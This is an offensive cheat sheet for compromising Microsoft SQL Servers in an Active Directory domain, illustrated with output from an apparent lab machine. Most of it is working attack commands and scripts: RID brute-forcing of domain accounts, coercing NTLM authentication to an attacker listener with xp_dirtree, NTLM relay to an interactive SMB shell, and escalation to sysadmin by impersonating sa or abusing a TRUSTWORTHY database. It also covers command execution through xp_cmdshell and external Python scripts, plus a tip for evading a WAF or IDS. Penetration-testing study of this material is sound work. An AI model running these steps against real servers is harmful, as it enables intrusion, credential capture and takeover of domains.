Enum
1. Check Privesc Path
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M mssql_priv
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M mssql_priv
2. List Logins that Can be Impersonated
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M enum_impersonate
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M enum_impersonate
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
ENUM_IMP... 10.129.254.242 1433 DC [-] No users with impersonation rights found.
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M enum_impersonate
3. Enumerate Active MSSQL Logins
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M enum_logins
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M enum_logins
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
ENUM_LOGINS 10.129.254.242 1433 DC [+] Logins found:
ENUM_LOGINS 10.129.254.242 1433 DC [*] - sa
ENUM_LOGINS 10.129.254.242 1433 DC [*] - SQLGuest
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M enum_logins
4. Enumerate Linked MSSQL Servers
# Local auth
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M enum_links
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M enum_links
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
ENUM_LINKS 10.129.254.242 1433 DC [+] Linked servers found:
ENUM_LINKS 10.129.254.242 1433 DC [*] - WIN-Q13O908QBPG\SQLEXPRESS
# Domain
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' -d '<DOMAIN>' -M enum_links
PowerUpSQL
1. Import Module
. .\PowerUpSQL.ps1
2. Audit
Invoke-SQLAudit -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Verbose
3. Execute Query
Get-SQLQuery -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Query "<QUERY>" -Verbose
Ref: PowerUpSQL.ps1
Domain Users Enum
1. Get Domain Name
SELECT DEFAULT_DOMAIN();
Sample Output:
SQL (SQLGuest guest@master)> SELECT DEFAULT_DOMAIN();
----------
REDELEGATE
2. Get Hex SID
SELECT master.dbo.fn_varbintohexstr(SUSER_SID('<DOMAIN>\Domain Admins'));
Sample Output:
SQL (SQLGuest guest@master)> SELECT master.dbo.fn_varbintohexstr(SUSER_SID('REDELEGATE\Domain Admins'));
----------------------------------------------------------
0x010500000000000515000000a185deefb22433798d8e847a00020000
3. Convert Hex SID to Readable String (PowerShell)
# Paste the hex from step 2 without the leading 0x. The last sub-authority of the result (512 here) is the RID of the group; drop it to get the SID base used in step 4.
$hexSid = "<HEX_SID>"
$sidBytes = [byte[]]::new($hexSid.Length / 2)
for ($i = 0; $i -lt $hexSid.Length; $i += 2) {
$sidBytes[$i / 2] = [Convert]::ToByte($hexSid.Substring($i, 2), 16)
}
$sid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
$sid.Value
Sample Output:
PS C:\Users\john> $hexSid = "010500000000000515000000a185deefb22433798d8e847a00020000"
PS C:\Users\john> $sidBytes = [byte[]]::new($hexSid.Length / 2)
PS C:\Users\john> for ($i = 0; $i -lt $hexSid.Length; $i += 2) {
>> $sidBytes[$i / 2] = [Convert]::ToByte($hexSid.Substring($i, 2), 16)
>> }
PS C:\Users\john> $sid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
PS C:\Users\john> $sid.value
S-1-5-21-4024337825-2033394866-2055507597-512
4. Domain Users Enum (impacket-mssqlclient, one query per RID)
#!/bin/bash
# Resolve RIDs to account names through the SQL Server with SUSER_SNAME(SID_BINARY(...)).
# Only the SQL login is needed; no direct LDAP/SMB access to the DC is required.
USERNAME="<USER>"
PASSWORD="<PASSWORD>"
SERVER="<TARGET>"
DOMAIN="<DOMAIN>"        # used to filter the client output, e.g. REDELEGATE
SID_BASE="<SID_BASE>"    # domain SID without the trailing RID, e.g. S-1-5-21-4024337825-2033394866-2055507597

query_sid() {
    local rid="$1"
    local full_sid="${SID_BASE}-${rid}"
    local sql="SELECT SUSER_SNAME(SID_BINARY(N'${full_sid}'))"
    # -file /dev/stdin lets mssqlclient read the query from the pipe; grep keeps only resolved names
    echo "$sql" | impacket-mssqlclient "${USERNAME}:${PASSWORD}@${SERVER}" -file /dev/stdin 2>/dev/null | grep -a "${DOMAIN}"
}

# 1100-1200 covers the first accounts created after domain promotion; widen the range as needed.
for rid in {1100..1200}; do
    query_sid "$rid"
done
Sample Output:
$ ./domain_users_enum.sh
REDELEGATE\FS01$
REDELEGATE\Christine.Flanders
REDELEGATE\Marie.Curie
---[SNIP]---
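Steps 1 to 4 above spend one client round-trip per RID. As an added example that is not part of the original page, the same sweep can be done server-side in a single T-SQL batch: the domain SID prefix is taken from the SID of Domain Admins (the last four bytes are the RID), each candidate RID is appended little-endian, and SUSER_SNAME resolves it, so only existing accounts come back. It assumes the instance is domain-joined (DEFAULT_DOMAIN() returns the AD domain, as in step 1) and that the login may call SUSER_SID/SUSER_SNAME, which the guest login in the samples can; the RID range is a placeholder to widen.

```sql
-- Added example: enumerate domain accounts by RID in one query (not the page's own code).
DECLARE @Domain sysname = DEFAULT_DOMAIN();        -- e.g. REDELEGATE
DECLARE @RidStart int = 500, @RidEnd int = 1200;   -- placeholder range; RIDs >= 1000 are user-created objects

-- Domain SID prefix = SID of a well-known domain group minus its 4-byte RID.
DECLARE @DomainSid varbinary(85) = SUSER_SID(@Domain + N'\Domain Admins');
IF @DomainSid IS NULL
    THROW 50000, N'Could not resolve the domain SID; the instance may not be domain-joined.', 1;
DECLARE @Prefix varbinary(85) = SUBSTRING(@DomainSid, 1, DATALENGTH(@DomainSid) - 4);

-- Recursive CTE generates the RID range; MAXRECURSION 0 lifts the default 100-level cap.
;WITH rids AS (
    SELECT @RidStart AS rid
    UNION ALL
    SELECT rid + 1 FROM rids WHERE rid < @RidEnd
)
SELECT s.rid,
       SUSER_SNAME(s.sid) AS account_name
FROM (
    SELECT rid,
           -- The RID is stored little-endian: append its bytes least-significant first.
           -- CAST(int AS binary(1)) keeps the low byte, so each term yields one byte.
           @Prefix
           + CAST( rid             % 256 AS binary(1))
           + CAST((rid / 256)      % 256 AS binary(1))
           + CAST((rid / 65536)    % 256 AS binary(1))
           + CAST((rid / 16777216) % 256 AS binary(1)) AS sid
    FROM rids
) AS s
WHERE SUSER_SNAME(s.sid) IS NOT NULL        -- unresolvable RIDs are dropped
ORDER BY s.rid
OPTION (MAXRECURSION 0);
```

Run it from any client (impacket-mssqlclient, sqlcmd, SSMS); the result is the same account list that the bash loop, nxc --rid-brute and the Metasploit module below produce, in a single round-trip. Widen the range in steps of a few thousand rather than at once, since every RID is still a lookup on the server side.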
NetExec
1. Domain Users Enum
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth --rid-brute
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL 10.129.254.242 1433 DC 498: REDELEGATE\Enterprise Read-only Domain Controllers
MSSQL 10.129.254.242 1433 DC 500: WIN-Q13O908QBPG\Administrator
---[SNIP]---
Metasploit
1. Start msfconsole
msfconsole
2. Use Module
use auxiliary/admin/mssql/mssql_enum_domain_accounts
3. Set Params
set RHOST <TARGET>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set RHOST 10.129.234.50
RHOST => 10.129.234.50
set RPORT <PORT>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set RPORT 1433
RPORT => 1433
set USERNAME <USER>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set USERNAME SQLGuest
USERNAME => SQLGuest
set PASSWORD <PASSWORD>
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set PASSWORD zDPBpaF4FywlqIv11vii
PASSWORD => zDPBpaF4FywlqIv11vii
set fuzznum 10000
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set fuzznum 10000
fuzznum => 10000
4. Domain Users Enum
run
Sample Output:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.129.234.50
[*] 10.129.234.50:1433 - Attempting to connect to the database server at 10.129.234.50:1433 as SQLGuest...
[+] 10.129.234.50:1433 - Connected.
[*] 10.129.234.50:1433 - SQL Server Name: WIN-Q13O908QBPG
[*] 10.129.234.50:1433 - Domain Name: REDELEGATE
[+] 10.129.234.50:1433 - Found the domain sid: 010500000000000515000000a185deefb22433798d8e847a
[*] 10.129.234.50:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.129.234.50:1433 - - WIN-Q13O908QBPG\Administrator
[*] 10.129.234.50:1433 - - REDELEGATE\Guest
[*] 10.129.234.50:1433 - - REDELEGATE\krbtgt
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Admins
---[SNIP]---
Get-SqlServer-Enum-WinAccounts (PowerShell)
1. Import Module
Import-Module .\Get-SqlServer-Enum-WinAccounts.psm1
Sample Output:
*Evil-WinRM* PS C:\programdata> Import-Module .\Get-SqlServer-Enum-WinAccounts.psm1
Warning: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~
2. Domain Users Enum
Get-SqlServer-Enum-WinAccounts -SQLServerInstance '<TARGET>' -SqlUser '<USER>' -SqlPass '<PASSWORD>' -FuzzNum 10000
Sample Output:
*Evil-WinRM* PS C:\programdata> Get-SqlServer-Enum-WinAccounts -SQLServerInstance "10.129.234.50" -SqlUser 'SQLGuest' -SqlPass 'zDPBpaF4FywlqIv11vii' –FuzzNum 10000
[*] Attempting to authenticate to 10.129.234.50 as the login SQLGuest...
[*] Connected.
[*] Enumerating domain...
[*] Domain found: REDELEGATE
[*] Enumerating domain SID...
[*] Domain SID found: 010500000000000515000000A185DEEFB22433798D8E847A
[*] Brute forcing 10000 RIDs...
[*] - WIN-Q13O908QBPG\Administrator
[*] - REDELEGATE\Guest
[*] - REDELEGATE\krbtgt
[*] - REDELEGATE\Domain Guests
---[SNIP]---
[*] 34 domain accounts / groups were found.
name
----
REDELEGATE\Allowed RODC Password Replication Group
REDELEGATE\Cert Publishers
REDELEGATE\Christine.Flanders
---[SNIP]---
Abuse #1: Capture the SQL Service Account's Net-NTLMv2 Hash (Coerced Authentication)
1. Start a Listener
sudo responder -I tun0
2. Coerce Authentication
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M mssql_coerce -o L=<LOCAL_IP>
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M mssql_coerce -o L=10.10.14.56
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL_CO... 10.129.254.242 1433 DC [*] Commands executed successfully, check the listener for results
# Method 1
use master; exec xp_dirtree '\\<LOCAL_IP>\any\thing';
# Method 2 (load_file() is MySQL, not T-SQL; on MSSQL use xp_fileexist)
exec master..xp_fileexist '\\<LOCAL_IP>\any\thing';
# Method 3
SELECT * FROM sys.dm_os_file_exists('\\<LOCAL_IP>\any\thing')
Abuse #2: NTLM Relay Attack
1. Check that SMB Signing is Not Required on the Relay Target
nxc smb <RELAY_TARGET> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
Sample Output:
$ nxc smb MS01.example.com -u 'dev01' -p 'Initial123' -d example.com
SMB 10.10.132.54 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:example.com) (signing:False) (SMBv1:False)
2. Start the NTLM Relay Server [the coerced SQL host cannot be relayed back to itself; pick another host with signing:False]
impacket-ntlmrelayx --no-http-server -smb2support -t <RELAY_TARGET> -i
Sample Output:
$ impacket-ntlmrelayx --no-http-server -smb2support -t DC01.example.com -i
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.132.54, attacking target smb://DC01.example.com
[*] Authenticating against smb://DC01.example.com as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
3. Coerce Authentication
nxc mssql <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M mssql_coerce -o L=<LOCAL_IP>
Sample Output:
$ nxc mssql DC.REDELEGATE.VL -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth -M mssql_coerce -o L=10.10.14.56
MSSQL 10.129.254.242 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.254.242 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL_CO... 10.129.254.242 1433 DC [*] Commands executed successfully, check the listener for results
# Method 1
use master; exec xp_dirtree '\\<LOCAL_IP>\any\thing';
# Method 2 (load_file() is MySQL, not T-SQL; on MSSQL use xp_fileexist)
exec master..xp_fileexist '\\<LOCAL_IP>\any\thing';
4. Interactive SMB Shell
nc 127.0.0.1 <LOCAL_PORT>
Sample Output:
$ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
#
Abuse #3: Run xp_cmdshell
1. Check for Server Triggers that Block xp_cmdshell [Optional]
select name from sys.server_triggers;
2. Disable the Trigger, if Any [Optional]
disable trigger <TRIGGER_NAME> on all server;
3. Enable xp_cmdshell (impacket-mssqlclient built-in command)
enable_xp_cmdshell;
4. RCE
xp_cmdshell powershell.exe -ep bypass <CMD>
Abuse #4: Impersonate sa to Run xp_cmdshell
1. Add User to Sysadmin
execute as login = 'sa'; exec sp_addsrvrolemember '<USER>','sysadmin'
2. Check
SELECT is_srvrolemember('sysadmin');
3. Enable xp_cmdshell
execute as login = 'sa'; exec sp_configure 'show advanced options', 1;
execute as login = 'sa'; reconfigure;
execute as login = 'sa'; exec sp_configure 'xp_cmdshell', 1;
execute as login = 'sa'; reconfigure;
4. RCE
execute as login = 'sa'; EXEC master..xp_cmdshell 'powershell.exe -ep bypass <CMD>'
Note: if a WAF or IDS matches on the keyword, try mixed case such as xp_cmDshElL; T-SQL identifiers are case-insensitive under the default collation.
Abuse #5: Exploit a TRUSTWORTHY Database as db_owner
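The enum_impersonate module in the Enum section reports which logins the current login may impersonate, and Abuse #4 uses that grant one statement at a time. As an added example that is not part of the original page, the T-SQL below does the whole chain in one session: it reads the IMPERSONATE grants from sys.server_permissions (the same data enum_impersonate reads), switches to the privileged login with EXECUTE AS LOGIN, enables xp_cmdshell, runs a command and REVERTs. It assumes the current login holds IMPERSONATE on a sysadmin login; 'sa' and 'whoami' are placeholders taken from the page's own examples.

```sql
-- Added example: impersonation enumeration plus escalation in one script (not the page's own code).

-- 1. Every explicit IMPERSONATE grant on a login, and whether the target is a sysadmin.
--    class 101 = SERVER_PRINCIPAL; state G = GRANT, W = GRANT WITH GRANT OPTION.
SELECT grantee.name                         AS grantee,
       target.name                          AS impersonable_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       sp.state_desc
FROM sys.server_permissions AS sp
JOIN sys.server_principals  AS grantee ON sp.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals  AS target  ON sp.major_id             = target.principal_id
WHERE sp.class = 101
  AND sp.permission_name = 'IMPERSONATE'
  AND sp.state IN ('G', 'W');

-- 2. Switch context. Everything until REVERT runs as this login (placeholder: sa).
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER                   AS now_running_as,
       IS_SRVROLEMEMBER('sysadmin')  AS is_sysadmin;   -- expect 1 before going further

-- 3. Enable xp_cmdshell; RECONFIGURE is required after each sp_configure change.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Run the command (placeholder: whoami) and return to the original login.
EXEC master..xp_cmdshell 'whoami';
REVERT;
```

The impersonation context is session-scoped, so a single EXECUTE AS LOGIN at the top is enough; the page's per-statement prefix also works but stacks one impersonation per statement. Leaving xp_cmdshell enabled is loud; re-run the two sp_configure calls with 0 when done if the engagement rules call for clean-up.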
1. Check Trustworthy Databases
SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;
Sample Output:
name     is_trustworthy_on
-------  -----------------
master   0
tempdb   0
model    0
msdb     1
2. Check Database Role Members (you need db_owner in the target database)
# Select target db
USE <TARGET_DB>;
# With target db in use
SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
Sample Output:
database_role            database_user
-----------------------  ----------------------------------
SQLAgentUserRole         SQLAgentReaderRole
SQLAgentReaderRole       SQLAgentOperatorRole
SQLAgentUserRole         dc_operator
db_ssisltduser           dc_operator
db_ssisoperator          dc_operator
dc_operator              dc_admin
db_ssisltduser           dc_proxy
db_ssisoperator          dc_proxy
SQLAgentUserRole         MS_DataCollectorInternalUser
db_ssisoperator          MS_DataCollectorInternalUser
dc_admin                 MS_DataCollectorInternalUser
SQLAgentOperatorRole     PolicyAdministratorRole
ServerGroupReaderRole    ServerGroupAdministratorRole
PolicyAdministratorRole  ##MS_PolicyEventProcessingLogin##
PolicyAdministratorRole  ##MS_PolicyTsqlExecutionLogin##
UtilityIMRReader         UtilityIMRWriter
db_owner                 EXAMPLE\svc_sql
(18 rows affected)
3. Exploit DB Owner (EXECUTE AS OWNER in a TRUSTWORTHY database runs as the database owner, usually sa)
# Add YOUR login to sysadmin, not the database owner's
CREATE OR ALTER PROCEDURE dbo.test WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [<USER>];
EXEC dbo.test;
EXEC sp_configure 'show advanced options', 1; Reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; Reconfigure;
EXEC xp_cmdshell '<CMD>'
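Steps 1 to 3 of Abuse #5 rely on two conditions that the page checks separately: the database is TRUSTWORTHY and its owner is a sysadmin login, and the current login holds db_owner in it. As an added example that is not part of the original page, the script below checks both in one pass (adding the owner, which the trustworthy query above does not show), then builds the escalation procedure with the current login's own name so nothing has to be typed by hand, verifies, and removes the helper. <TARGET_DB> and the procedure name are placeholders; it assumes SQL Server 2016 SP1 or later for CREATE OR ALTER, which the page's own step also uses.

```sql
-- Added example: TRUSTWORTHY / db_owner preconditions and escalation (not the page's own code).

-- 1. Candidate databases: TRUSTWORTHY and owned by a sysadmin login (msdb is TRUSTWORTHY by default).
SELECT d.name,
       SUSER_SNAME(d.owner_sid)                               AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1;

USE <TARGET_DB>;

-- 2. The current login must be db_owner here (1 = yes); ORIGINAL_LOGIN() is the name we will add.
SELECT IS_MEMBER('db_owner') AS am_db_owner,
       ORIGINAL_LOGIN()      AS my_login;

-- 3. CREATE PROCEDURE must start its own batch, so it is issued through EXEC.
--    WITH EXECUTE AS OWNER makes the body run as the database owner (sa in the page's case),
--    and TRUSTWORTHY ON lets that context act at server level, so it can grant sysadmin.
DECLARE @sql nvarchar(max) = N'
CREATE OR ALTER PROCEDURE dbo.escalate_tmp WITH EXECUTE AS OWNER AS
    ALTER SERVER ROLE sysadmin ADD MEMBER ' + QUOTENAME(ORIGINAL_LOGIN()) + N';';
EXEC (@sql);
EXEC dbo.escalate_tmp;

-- 4. Verify (1 = sysadmin) and drop the helper so the escalation path is not left behind.
SELECT IS_SRVROLEMEMBER('sysadmin') AS am_sysadmin;
DROP PROCEDURE dbo.escalate_tmp;
```

If the owner_is_sysadmin column is 0 the trick still runs, but only with that owner's privileges, so pick a database owned by sa or another sysadmin. QUOTENAME handles Windows logins such as DOMAIN\user as well as SQL logins.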
Abuse #6: Run External Script
1. Run External Script (Python)
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("<CMD>");';
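The one-liner above fires os.system() blind and only works if external scripts are already enabled. As an added example that is not part of the original page, the batch below enables the feature, runs the command through subprocess and returns its output as a result set. It assumes Machine Learning Services with Python is installed on the instance (the page's step requires this too) and that the login holds the sysadmin or ALTER SETTINGS permission needed for sp_configure; 'whoami' is a placeholder command.

```sql
-- Added example: external Python script with captured output (not the page's own code).

-- 1. Enable the feature; on SQL Server 2016 a service restart is also required after this.
EXEC sp_configure 'external scripts enabled', 1;
RECONFIGURE;

-- 2. Run the command and hand its output back as rows. subprocess.PIPE/universal_newlines
--    rather than capture_output so it also runs on the Python 3.5 shipped with SQL Server 2017.
EXEC sp_execute_external_script
    @language = N'Python',
    @script   = N'
import subprocess
import pandas as pd
proc = subprocess.run(["cmd.exe", "/c", "whoami"],
                      stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                      universal_newlines=True)
lines = proc.stdout.splitlines() or ["<no output, exit code %d>" % proc.returncode]
OutputDataSet = pd.DataFrame({"output": lines})
'
WITH RESULT SETS ((output nvarchar(max)));
```

The script does not run as the SQL Server service account: the Launchpad service executes it under a low-privileged worker account, so the whoami result shows what this path actually yields before spending time on it.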